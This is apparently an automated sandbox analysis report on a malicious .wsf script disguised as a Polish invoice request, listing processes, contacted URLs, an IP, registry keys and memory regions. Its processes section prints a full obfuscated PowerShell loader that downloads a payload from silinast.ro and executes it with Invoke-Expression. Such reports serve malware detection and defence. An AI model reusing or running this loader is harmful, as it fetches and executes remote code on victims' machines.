Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Wniosek o numer faktury.wsf
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_did32yk0.pdw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbyx2vmw.35g.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c ping 6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens
#>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If
($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres;
for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function
Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl
Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis
NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S
eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos
esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi
Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet
'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet
'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/
UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet
'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria
(Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci
ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM
ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku
spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr
teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada
VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$
Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria
(Citationstegnet 'Contral[ SandblnYawl nkEXiphipltAartier. ,erpenS Fla.gieVictorir StatsvvPo ygeniS philiCBlaffe eModulvip
ensdyrO bil igiBlokadeNCholecyTLovprisMHjhletfAFibroelNN edlemaLongbowgHv,skedEJamborerTrktjet]philomu:Elforsy:b,ckbussBraiserEGlyconeCSkeletouSingul.RNationaIjedd,hitCommin.yHu
tankpSwoosheRHydro,lo TidtagtNonshatOfr dmmeC Jor,broHaleweelUdsprin Boldtre=Pteropu Strejf[Ve.nacuNMizenmaeTranquiT Anostr.Rationas
D.shalE nowbloCFlus erUFluktueRUsheriaITekstilTEpi idyyShedmanPJydepotr But,ksOH.lotriTAg rnsuOLivskracSpilledois andsLGenetabTUntwitcYcrestsrPHoodshyELredren]
gldssa:homemak:Form ddT Bra,etLMellemfs Abdomi1Uncoaxe2 Superf ');$Maalestationernes=$Upsettal[0];$eupnoeic=(Citationstegnet
'Po tula$ Spermag ,alataLSlvstolOIntell.b W,nderaChefk nLWrangle:VildtdidFluviale demi aAPotholer VedersYFluor s2 Lovreg3Sprogkl3Rayonna=undervinslambeheNectriaW
Subung- PeroliO WoolieBLgnehisJGarapateUna brec uggenttT ermot HymenopsOppo itY A.minisS.rivelt eemanaEDe ennimPatriar.War
letnTabelleErivettitF,rstan.Listep WVinderteOverstiBDri,tsiC SponsoLColaensI S.cialE Rec ifNafvikliTUdydsva ');Humiria ($eupnoeic);Humiria
(Citationstegnet 'Gulliut$u graveDMidshipe ste peaSourtoprs,pramayLeverin2Dehydra3Adjuvat3 Sa men.Gr ynesHRichn.seSejpinea,ranchedSubmerge
Rets.rrSekundasGopural[Slyng i$andenklAHypapoppDagsprirAa enhjiCounterlSafthols lapsenter,itoaRtehalmrbagefors pardie1Gungrem9Fe
mate0Sl bnin]p.theca= Stepd.$Guas.alUPalewi d Abb.evf SelvhelSacrifia.pectrudTele henSpectroiHom,nymnSappa wgHurriexeAntimonrPoachernseasonaeOverr
s1Perspekv harteryBlo rigb Retroce Foliarr TambalrDelkredyBilledf ');$Venskabsbyen=Citationstegnet 'Un.erkb$ .hylloD Morbi
eShrewisa Fortolr eitonoy nderpa2Fructuo3 Marche3Ectopla. RosewoDEksilero Ngleomw Nonradn CountelFabrikaoOveroffaSulphiddIrmamrkF
anensciDr ntfolFredrikebogklub(Sammens$LarrikiMDosmerna Sundh,aVan.lbslSanselie Sele.tsDobbelttVigint avagrantt H.rejuiConvivioInddmconUnmembee
Ma dskr blytkkn Popul.eValewarsHo.shan,Trykblg$EfterviRBararmeuSkaf,esbForfl,di DemonoaDemountc FuturoeblndramaChronise Rednin)
Egensk ';$Rubiaceae=$administrationsprogrammer;Humiria (Citationstegnet 'Ev ngel$ Ta,ellgSnitselLDiscandoEkstre.BStin svaSplenolLMedh.lp:P
oletaoShahe,sFKipkalvfPolygamICensurkCotiticei ServieaUnderudlKbslaaaVMunsifciOverlubR LeachekSubsistsMesonepOBla dinMSubramohE.aarigEFuglehaDBronchoE
Eksperr Social4 Roligt4 Overtr=Horaten(Kat,batTFoxtrotE QuisquS NominatD sbenc-VarselsP BetingA Fore.dtComitatHParthen egelis$TrstubbRSpeedomuSelenosBDesig.fiRedemptA
Appetic Trans eGodsterAPillorieVejenkl)Kvgbrug ');while (!$Officialvirksomheder44) {Humiria (Citationstegnet ' Opretn$Expand.gBoozinelK
ivkamoMinim.rbOtocystapleasaulAdviser:Mo omolC UdgiftoGobblinlSkibsr,lDioicouy evggrub pleopoadigono =Tilsp.r$Pyoi betcofi.anr
Kategou antiscePhospho ') ;Humiria $Venskabsbyen;Humiria (Citationstegnet 'S,lowviSChristiTTransisaRehoninr,valiteTFintede-Unikae
s,latycnLVert biE,acrameeQuinovopClinoph Domajig4Calatra ');Humiria (Citationstegnet ' Bilbre$ atsdekgAegteskl SlagteOSocio
oBS,lerodAVulgariLWorkbas:snowshaO ndiscFCatchplf Str foI Kryst cDicotylIModarb aDenouncLheraldrvSacketcI S outerAnticorkLag
rbeSTeasellOLmmelstmPre,onshcircumseUn ulatdpolemoseSu ernirIndlagt4Tonnens4Beruser=Synsv d(ZarerviTBesl tnESmilerhSunst inT
skrift-Falshvlp sldrevaHengivetBlokbebh Isohes Raekker$Mu ticyrOverv,ruT,lentfb aniskeiSedimenAFodl ngcBino,iaEOverrelasavoroueKri.sra)Non
pos ') ;Humiria (Citationstegnet 'Indremi$BitestiG InspirLTumidito TrbeskbGenyantaF rbrydLBerring:Bet gensPenta eCIvrkstthEksportO
onsillo utpresLMark nghHyperviOUninterUDe,ainaskancelleKlag adSCiril o=D meskr$ nruddgUn,ordyLMudde,pOGottharBHospitaAInkorpoL
Deta h:underdeo a ribrrUnappreihustankSSstridspRagoutehHaartopEEntreprRUn.ougheRepelli+Ceylone+Fednmag%Ydmyg.d$DiapnotULov
stePUn selisSammensEcum,noiTFluidist TroposAAl,mnollMouseba. T lhoec IndsyoO SlidsoUTrivia NSpacecrTindvend ') ;$Maalestationernes=$Upsettal[$schoolhouses];}$Effektfuld=311542;$Garnnglers=33970;Humiria
(Citationstegnet 'Flad.ng$ almebgGUdkoblelPintaskO BrobygBOpvejeraUncon.ilU level:Fa ulteETndrrsnm Sabba bUdenrigRkyllin OEndocriSMagi.trc
VidereOHombretPweed inI SurfedCPa ynol Folk re= En.old FasanhnGThal aneNy ansktVelkoms-SkenderCInrusheo jertesN KontorTButi
keeNo ditanChungviTOmstnin Udrug $TestamerTonikaeUBackarrBSkribleiKlemat aUbekrftCRandomiECoinquiaA ylemiePerspek ');Humiria
(Citationstegnet '.mmodyt$RealitegBlackgulheteroco Rkvrkeb BropenaStngelelNucleat:tapaderSSocialleOlfactymSej brtiUnhonesnRubbereiashilymsYalelaatR
books2Clodpol4cantr p3racehes Dogmat=Pilpais Dagafsn[CurricuSRubblinyCranke swired,atNonlique forgivmunridab.ExquisiCC shkluo
BalletnSynta svAnegalle oupetfrBrisjabtReh efo]Life,ty: Andrag:UnsearcFAgurksprDueske o Ci clemSquamygBGipsdepaEuropaksO fwhiteS,upnef6Kimissv4indkbsaS
nplankt proaccrSagnfigiNic namnCel ermgTim lia(Inexora$panningEPa elunmP stinsbDronninrFortidsoGraphics Percenc Soci loPreindupKur,udviMyndighcGossame)Forvist
');Humiria (Citationstegnet 'Foldout$SparepegAlkylolLSenilisoBippeneBDumpnina LaparoLSide il:LangvarL usstano Pe minO Adoni.KLeukoseDSkrte
uoSjlevanWIlfrdignGamblessUntissu Harpun =Wickyfo Debyein[ Re nfrsKlagdocyKommuneS DesserT angsveeEquilinmP ulina.RugbyenTPapirdoe
BrugerXTilrettt S yros.Begyn.eePredissnTachomeC onstorORodetcodDipoleri MdeaftnRungendgAchokes] Jordvo:uvurder: Nonat ABill.dhsDiluviuCHyponomiTomasteIOreocar.genforeGPeritoneEbelt,ftTrehedesVenligstVi
tigtR BanabaILisabetNtehuecoGNonstat(omstill$ AntigeS DuridiEVertikaMHageskgIPropinqn O helcIIskagemS Hexad tUn slaa2 okalp4Forthse3u
adjus)Looking ');Humiria (Citationstegnet 'Phototy$CatchphG VidtlfLMeddelso TintinbDacapona BefrieLKanjist:TmrermeNFrangibO
BettonN askinfCHygiejna SlabbenNonreseDReallnnIHjssoneDRekapitaStude rT tearinEUdgivelSForhand=Knnessk$ EkkololPostninO anim
loFibrillKCepforsdElianasO destitWComminuNhobbyi S Inju i.FlakonesEkstr.oUApothecbDevalueSPara idTNicolaiRDr,vtmmiUdligniNDivertiGRecoils(
hasian$Ni htimE,yromanf ammenkfToraerseMyer,orK BenzintRefuserf artoonuHorsecrLRitteniD Obispo,Udenla $ HyrekrgGedesk,ADaaredertankangnDanielun
PejoraG SkatteLSwe.tieeHyaluror RdkaalS ortari)Unhaggl ');Humiria $Noncandidates;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://silinast.ro
|
unknown
|
|
|
|
http://silinast.ro(
|
unknown
|
|
|
|
http://silinast.ro/Juglandin.xtpP
|
unknown
|
|
|
|
http://silinast.ro/Juglandin.xtp
|
188.241.183.45
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
6777.6777.6777.677e
|
unknown
|
|
|
|
silinast.ro
|
188.241.183.45
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.241.183.45
|
silinast.ro
|
Romania
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
15D81DC6000
|
trusted library allocation
|
page read and write
|
||
|
1C757FBF000
|
heap
|
page read and write
|
||
|
1C756194000
|
heap
|
page read and write
|
||
|
1E710FF000
|
stack
|
page read and write
|
||
|
1C756151000
|
heap
|
page read and write
|
||
|
1C756139000
|
heap
|
page read and write
|
||
|
15DEF0A0000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D81D2A000
|
trusted library allocation
|
page read and write
|
||
|
15DEFA73000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
15D90010000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
15DEFD80000
|
heap
|
page read and write
|
||
|
15D8166A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34781000
|
trusted library allocation
|
page read and write
|
||
|
15D81786000
|
trusted library allocation
|
page read and write
|
||
|
15D81131000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page execute and read and write
|
||
|
18361FF000
|
stack
|
page read and write
|
||
|
15DED80F000
|
heap
|
page read and write
|
||
|
1C757FBF000
|
heap
|
page read and write
|
||
|
15D81928000
|
trusted library allocation
|
page read and write
|
||
|
18367FE000
|
stack
|
page read and write
|
||
|
1C75618E000
|
heap
|
page read and write
|
||
|
1C75630D000
|
heap
|
page read and write
|
||
|
15DEF313000
|
heap
|
page read and write
|
||
|
7FFD345D4000
|
trusted library allocation
|
page read and write
|
||
|
1C757FE5000
|
heap
|
page read and write
|
||
|
1836578000
|
stack
|
page read and write
|
||
|
1C756210000
|
heap
|
page read and write
|
||
|
1C756172000
|
heap
|
page read and write
|
||
|
1C756119000
|
heap
|
page read and write
|
||
|
B7C8FE000
|
stack
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
B7CCFE000
|
stack
|
page read and write
|
||
|
1E70FFF000
|
unkown
|
page read and write
|
||
|
15D81649000
|
trusted library allocation
|
page read and write
|
||
|
1E70EFC000
|
stack
|
page read and write
|
||
|
B7C4FA000
|
stack
|
page read and write
|
||
|
15DEF110000
|
heap
|
page readonly
|
||
|
1C75630A000
|
heap
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
1C7561A3000
|
heap
|
page read and write
|
||
|
1C75617A000
|
heap
|
page read and write
|
||
|
15DEF7BA000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
183734D000
|
stack
|
page read and write
|
||
|
7FFD346B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1835DEF000
|
stack
|
page read and write
|
||
|
183724E000
|
stack
|
page read and write
|
||
|
1C7561A3000
|
heap
|
page read and write
|
||
|
15DEF270000
|
heap
|
page execute and read and write
|
||
|
B7C5FE000
|
stack
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
186EE930000
|
heap
|
page read and write
|
||
|
15DEF1B6000
|
heap
|
page read and write
|
||
|
15D81BA5000
|
trusted library allocation
|
page read and write
|
||
|
15D80001000
|
trusted library allocation
|
page read and write
|
||
|
1C756309000
|
heap
|
page read and write
|
||
|
15DED898000
|
heap
|
page read and write
|
||
|
1C756110000
|
heap
|
page read and write
|
||
|
1C757FE5000
|
heap
|
page read and write
|
||
|
15DED7B0000
|
heap
|
page read and write
|
||
|
7FFD345D2000
|
trusted library allocation
|
page read and write
|
||
|
1C757FB8000
|
heap
|
page read and write
|
||
|
15DEFAAB000
|
heap
|
page read and write
|
||
|
1C75630A000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
1C756194000
|
heap
|
page read and write
|
||
|
1C75630C000
|
heap
|
page read and write
|
||
|
15D815C4000
|
trusted library allocation
|
page read and write
|
||
|
15DEFADE000
|
heap
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
1C75616C000
|
heap
|
page read and write
|
||
|
15DEF0C0000
|
trusted library section
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15DED851000
|
heap
|
page read and write
|
||
|
1C7561F7000
|
heap
|
page read and write
|
||
|
15DEF860000
|
heap
|
page execute and read and write
|
||
|
15D8047F000
|
trusted library allocation
|
page read and write
|
||
|
1C757FC7000
|
heap
|
page read and write
|
||
|
7FFD347B2000
|
trusted library allocation
|
page read and write
|
||
|
15D81D6B000
|
trusted library allocation
|
page read and write
|
||
|
1C756140000
|
heap
|
page read and write
|
||
|
1C757FBF000
|
heap
|
page read and write
|
||
|
15D82342000
|
trusted library allocation
|
page read and write
|
||
|
1C757FBF000
|
heap
|
page read and write
|
||
|
15DEF0E0000
|
trusted library allocation
|
page read and write
|
||
|
1C757FC6000
|
heap
|
page read and write
|
||
|
15DED84D000
|
heap
|
page read and write
|
||
|
15DEF937000
|
heap
|
page execute and read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
1C756182000
|
heap
|
page read and write
|
||
|
1C756182000
|
heap
|
page read and write
|
||
|
B7CBFD000
|
stack
|
page read and write
|
||
|
1C75613A000
|
heap
|
page read and write
|
||
|
183627C000
|
stack
|
page read and write
|
||
|
1C7561BA000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
1C75619A000
|
heap
|
page read and write
|
||
|
15D90001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
18371FA000
|
stack
|
page read and write
|
||
|
1C757FCB000
|
heap
|
page read and write
|
||
|
1C757C60000
|
heap
|
page read and write
|
||
|
B7CDFE000
|
stack
|
page read and write
|
||
|
1C756305000
|
heap
|
page read and write
|
||
|
1C757FC7000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
7DF452340000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D80A52000
|
trusted library allocation
|
page read and write
|
||
|
B7C9FF000
|
stack
|
page read and write
|
||
|
15D8135F000
|
trusted library allocation
|
page read and write
|
||
|
15D81205000
|
trusted library allocation
|
page read and write
|
||
|
15D817C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
1C75630C000
|
heap
|
page read and write
|
||
|
15DEF100000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345EB000
|
trusted library allocation
|
page read and write
|
||
|
1C75617E000
|
heap
|
page read and write
|
||
|
1C7561DA000
|
heap
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
1C756192000
|
heap
|
page read and write
|
||
|
1C75619F000
|
heap
|
page read and write
|
||
|
15DEF120000
|
trusted library allocation
|
page read and write
|
||
|
15DED869000
|
heap
|
page read and write
|
||
|
15D815B9000
|
trusted library allocation
|
page read and write
|
||
|
1C756000000
|
heap
|
page read and write
|
||
|
15D8043F000
|
trusted library allocation
|
page read and write
|
||
|
1C756151000
|
heap
|
page read and write
|
||
|
1836078000
|
stack
|
page read and write
|
||
|
15DEF2F3000
|
trusted library allocation
|
page read and write
|
||
|
1C7561BA000
|
heap
|
page read and write
|
||
|
15D817E0000
|
trusted library allocation
|
page read and write
|
||
|
1C75630A000
|
heap
|
page read and write
|
||
|
1C756194000
|
heap
|
page read and write
|
||
|
15DEF770000
|
heap
|
page read and write
|
||
|
15D902EB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
1C756194000
|
heap
|
page read and write
|
||
|
1C7561DA000
|
heap
|
page read and write
|
||
|
15D813E7000
|
trusted library allocation
|
page read and write
|
||
|
1835DA3000
|
stack
|
page read and write
|
||
|
15DED7C0000
|
heap
|
page read and write
|
||
|
15D805E2000
|
trusted library allocation
|
page read and write
|
||
|
15D80229000
|
trusted library allocation
|
page read and write
|
||
|
1C757FD6000
|
heap
|
page read and write
|
||
|
1C756300000
|
heap
|
page read and write
|
||
|
1C756190000
|
heap
|
page read and write
|
||
|
15D81549000
|
trusted library allocation
|
page read and write
|
||
|
18360FE000
|
stack
|
page read and write
|
||
|
15D901B4000
|
trusted library allocation
|
page read and write
|
||
|
18366FE000
|
stack
|
page read and write
|
||
|
1C757FB1000
|
heap
|
page read and write
|
||
|
1C756152000
|
heap
|
page read and write
|
||
|
15DEFAA1000
|
heap
|
page read and write
|
||
|
1C757FD6000
|
heap
|
page read and write
|
||
|
1C75619E000
|
heap
|
page read and write
|
||
|
15DEF150000
|
trusted library allocation
|
page read and write
|
||
|
15DEF300000
|
heap
|
page read and write
|
||
|
15D80087000
|
trusted library allocation
|
page read and write
|
||
|
186EEA40000
|
heap
|
page read and write
|
||
|
15DED800000
|
heap
|
page read and write
|
||
|
1C75617E000
|
heap
|
page read and write
|
||
|
15DEF0D0000
|
trusted library section
|
page read and write
|
||
|
7FFD345DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C756307000
|
heap
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
186EE940000
|
heap
|
page read and write
|
||
|
15D81655000
|
trusted library allocation
|
page read and write
|
||
|
1836479000
|
stack
|
page read and write
|
||
|
15D81593000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
186EE7A0000
|
heap
|
page read and write
|
||
|
15D8188B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3462C000
|
trusted library allocation
|
page execute and read and write
|
||
|
186EE880000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
1C756136000
|
heap
|
page read and write
|
||
|
15DEF760000
|
heap
|
page read and write
|
||
|
15DEFA67000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
1C756176000
|
heap
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page execute and read and write
|
||
|
18364F7000
|
stack
|
page read and write
|
||
|
15DEF190000
|
trusted library allocation
|
page read and write
|
||
|
15DEF831000
|
heap
|
page read and write
|
||
|
15D813A5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
15D819EC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3468C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C7561C5000
|
heap
|
page read and write
|
||
|
7FFD34686000
|
trusted library allocation
|
page read and write
|
||
|
15D81589000
|
trusted library allocation
|
page read and write
|
||
|
1C75613F000
|
heap
|
page read and write
|
||
|
15DEF1B0000
|
heap
|
page read and write
|
||
|
1C757FBF000
|
heap
|
page read and write
|
||
|
183687B000
|
stack
|
page read and write
|
||
|
1C757FC8000
|
heap
|
page read and write
|
||
|
15DEFA6B000
|
heap
|
page read and write
|
||
|
1C7561A3000
|
heap
|
page read and write
|
||
|
15DED853000
|
heap
|
page read and write
|
||
|
15D80FCB000
|
trusted library allocation
|
page read and write
|
||
|
15D81308000
|
trusted library allocation
|
page read and write
|
||
|
186EE94B000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
15DEF2F0000
|
trusted library allocation
|
page read and write
|
||
|
15D80491000
|
trusted library allocation
|
page read and write
|
||
|
1C757FB7000
|
heap
|
page read and write
|
||
|
1C757FB3000
|
heap
|
page read and write
|
||
|
15D817EF000
|
trusted library allocation
|
page read and write
|
||
|
15DED6B0000
|
heap
|
page read and write
|
||
|
15D81B9B000
|
trusted library allocation
|
page read and write
|
||
|
15D81B34000
|
trusted library allocation
|
page read and write
|
||
|
15D81486000
|
trusted library allocation
|
page read and write
|
||
|
15D81484000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
1C75630D000
|
heap
|
page read and write
|
||
|
15D80DE0000
|
trusted library allocation
|
page read and write
|
||
|
1C75613B000
|
heap
|
page read and write
|
||
|
1C757FB0000
|
heap
|
page read and write
|
||
|
B7CEFB000
|
stack
|
page read and write
|
||
|
15D80578000
|
trusted library allocation
|
page read and write
|
||
|
15DED790000
|
heap
|
page read and write
|
||
|
15DEF960000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
|
1C756122000
|
heap
|
page read and write
|
||
|
1C757FB2000
|
heap
|
page read and write
|
||
|
186EE966000
|
heap
|
page read and write
|
||
|
15D8095E000
|
trusted library allocation
|
page read and write
|
||
|
B7C6FE000
|
stack
|
page read and write
|
||
|
1C756190000
|
heap
|
page read and write
|
||
|
186EE8A0000
|
heap
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
15DED7B5000
|
heap
|
page read and write
|
||
|
1C7561EA000
|
heap
|
page read and write
|
||
|
7FFD345D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
15D90071000
|
trusted library allocation
|
page read and write
|
||
|
186EE965000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C757FB2000
|
heap
|
page read and write
|
||
|
1C7561BA000
|
heap
|
page read and write
|
||
|
1C7561BA000
|
heap
|
page read and write
|
||
|
1C756183000
|
heap
|
page read and write
|
||
|
15D81514000
|
trusted library allocation
|
page read and write
|
||
|
15DEF930000
|
heap
|
page execute and read and write
|
||
|
15D805D3000
|
trusted library allocation
|
page read and write
|
||
|
18372CE000
